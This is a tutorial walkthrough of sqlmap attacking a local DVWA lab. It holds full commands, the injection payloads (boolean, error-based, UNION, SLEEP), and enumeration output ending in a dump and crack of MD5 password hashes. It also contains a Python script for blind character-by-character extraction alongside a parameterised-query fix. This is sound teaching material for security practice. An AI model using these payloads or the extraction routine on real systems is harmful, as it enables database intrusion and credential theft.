Error-based SQL injection makes the database error message visible in the page, so the attacker can read results straight out of it. Blind SQL injection returns no error message at all: the attacker has to infer each answer from a difference in the page content (boolean-based) or in the response time (time-based). The DVWA run below turns out to be injectable in all of these ways, plus a UNION query.
Start sqlmap and enter the command for the scan. --cookie carries the DVWA session and security=low, --string="Surname" tells sqlmap which text marks a "true" page so it can tell true from false responses in the boolean-based blind test, and --dbs asks for the list of databases:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 00:38:58

[00:38:58] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[00:38:58] [INFO] testing connection to the target url
[00:38:59] [INFO] testing if the provided string is within the target URL page content
[00:38:59] [INFO] testing if GET parameter 'id' is dynamic
[00:38:59] [INFO] confirming that GET parameter 'id' is dynamic
[00:38:59] [INFO] GET parameter 'id' is dynamic
[00:38:59] [INFO] heuristics detected web page charset 'ascii'
[00:38:59] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[00:38:59] [INFO] testing sql injection on GET parameter 'id'
[00:38:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:38:59] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[00:38:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:38:59] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[00:38:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:38:59] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:39:09] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[00:39:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:39:09] [INFO] target url appears to be UNION injectable with 2 columns
[00:39:10] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[00:39:11] [INFO] testing if GET parameter 'Submit' is dynamic
[00:39:11] [WARNING] GET parameter 'Submit' appears to be not dynamic
[00:39:11] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[00:39:11] [INFO] testing sql injection on GET parameter 'Submit'
[00:39:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:39:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:39:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:39:12] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[00:39:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:39:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:39:15] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[00:39:15] [INFO] manual usage of GET payloads requires url encoding
[00:39:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[00:39:15] [INFO] fetching database names
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql

[00:39:15] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 00:39:15
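To make the difference between the techniques sqlmap just found concrete, here is an added example (not from the original post and not sqlmap's own code): a miniature of DVWA's "low" SQLi page on an in-memory SQLite database. The sample rows, the user names and the extraction loop are constructed for the example, and the MySQL payload functions are swapped for their SQLite equivalents (substr/unicode in place of SUBSTRING/ASCII). It shows the error-based leak (a driver error echoed into the page), the boolean oracle that --string="Surname" gives sqlmap, a character-by-character blind dump of a password hash through that oracle alone, and the parameterised query that closes the hole. Time-based blind is not modelled; it is the same oracle with SLEEP() standing in for the missing string.

```python
"""Added example (not from the original post, not sqlmap code): a miniature of the
DVWA 'low' SQLi page on an in-memory SQLite database, to show what sqlmap's
error-based, boolean-based blind and --string oracle do. Sample rows, user names
and the extraction loop are constructed; MySQL functions are swapped for their
SQLite equivalents (substr/unicode instead of SUBSTRING/ASCII)."""
import sqlite3

# Constructed sample data shaped like dvwa.users; the hashes are the four values
# sqlmap dumps later on this page, the names are made up for the example.
_ROWS = [
    (1, "Alice", "Admin", "alice", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Bob", "Builder", "bob", "e99a18c428cb38d5f260853678922e03"),
    (3, "Carol", "Coder", "carol", "8d3533d75ae2c3966d7e0d4fcc69216b"),
    (4, "Dave", "Dev", "dave", "0d107d09f5bbe40cade3de5c71e9e9b7"),
]


def _connect():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
               "last_name TEXT, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", _ROWS)
    return db


DB = _connect()


def _render(rows):
    return "".join(f"First name: {f}<br>Surname: {l}<br>" for f, l in rows)


def vulnerable_page(id_param):
    """DVWA 'low': the id parameter is pasted into the SQL text. A matching row
    prints 'Surname: ...'; a broken query echoes the driver error (error-based);
    a false condition prints nothing at all (the blind case)."""
    query = ("SELECT first_name, last_name FROM users "
             "WHERE user_id = '" + id_param + "'")
    try:
        return _render(DB.execute(query).fetchall())
    except sqlite3.Error as exc:
        return "Error: " + str(exc)


def hardened_page(id_param):
    """Same lookup with a bound parameter: input is data, never SQL syntax."""
    rows = DB.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                      (id_param,)).fetchall()
    return _render(rows)


def oracle(page):
    """What --string="Surname" gives sqlmap: a page is 'true' iff it contains the string."""
    return "Surname" in page


def blind_extract(fetch, subquery, max_len=64):
    """Boolean-based blind retrieval of a scalar SQL expression, one character
    at a time, binary-searching the code point (7 requests per character).
    Returns (recovered_text, number_of_requests)."""
    text, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Same shape as sqlmap's payload: close the quote, add the
            # condition, re-balance the trailing quote with a tautology.
            payload = (f"1' AND unicode(substr(({subquery}), {pos}, 1)) > {mid} "
                       f"AND 'a'='a")
            requests += 1
            if oracle(fetch(payload)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end: unicode('') is NULL, so every test was false
            break
        text += chr(lo)
    return text, requests


if __name__ == "__main__":
    print(vulnerable_page("1"))                                # normal page
    print(vulnerable_page("1'"))                               # error-based leak
    print(repr(vulnerable_page("1' AND 1=2 AND 'a'='a")))      # blind: empty page
    print(blind_extract(vulnerable_page,
                        "SELECT password FROM users WHERE user_id = 1"))
    print(blind_extract(hardened_page,
                        "SELECT password FROM users WHERE user_id = 1"))
```

Run it directly to see the three page responses and the recovered hash. The request count (231 for one 32-character hash) is the reason sqlmap prefers error-based or UNION retrieval when either is available and falls back to boolean-based or time-based blind only when it must; it is also why the 133 detection requests above are followed by 0 in the later runs, where sqlmap simply resumes from its session file.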
Next, enumerate the tables in the dvwa database. sqlmap resumes the injection points from its session file, so this run needs no further detection requests:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa --tables
[*] starting at: 00:42:45

[00:42:45] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[00:42:45] [INFO] resuming injection data from session file
[00:42:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[00:42:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[00:42:45] [INFO] manual usage of GET payloads requires url encoding
[00:42:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[00:42:45] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[00:42:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 00:42:45
List the columns of the users table:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa -T users --columns
[*] starting at: 00:44:34

[00:44:35] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[00:44:35] [INFO] resuming injection data from session file
[00:44:35] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[00:44:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[00:44:35] [INFO] manual usage of GET payloads requires url encoding
[00:44:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[00:44:35] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+

[00:44:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 00:44:35
Dump the password column. The varchar(32) type already hints at unsalted MD5, and sqlmap confirms it and offers to crack the values with its bundled wordlist:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa -T users -C password --dump
[*] starting at: 00:49:52

[00:49:52] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[00:49:52] [INFO] resuming injection data from session file
[00:49:52] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[00:49:52] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[00:49:52] [INFO] manual usage of GET payloads requires url encoding
[00:49:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[00:49:54] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[00:49:54] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[00:49:56] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[00:49:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[00:50:00] [INFO] starting dictionary attack (md5_generic_passwd)
[00:50:00] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[00:50:01] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[00:50:01] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[00:50:02] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| e99a18c428cb38d5f260853678922e03 (abc123)   |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[00:50:02] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[00:50:02] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'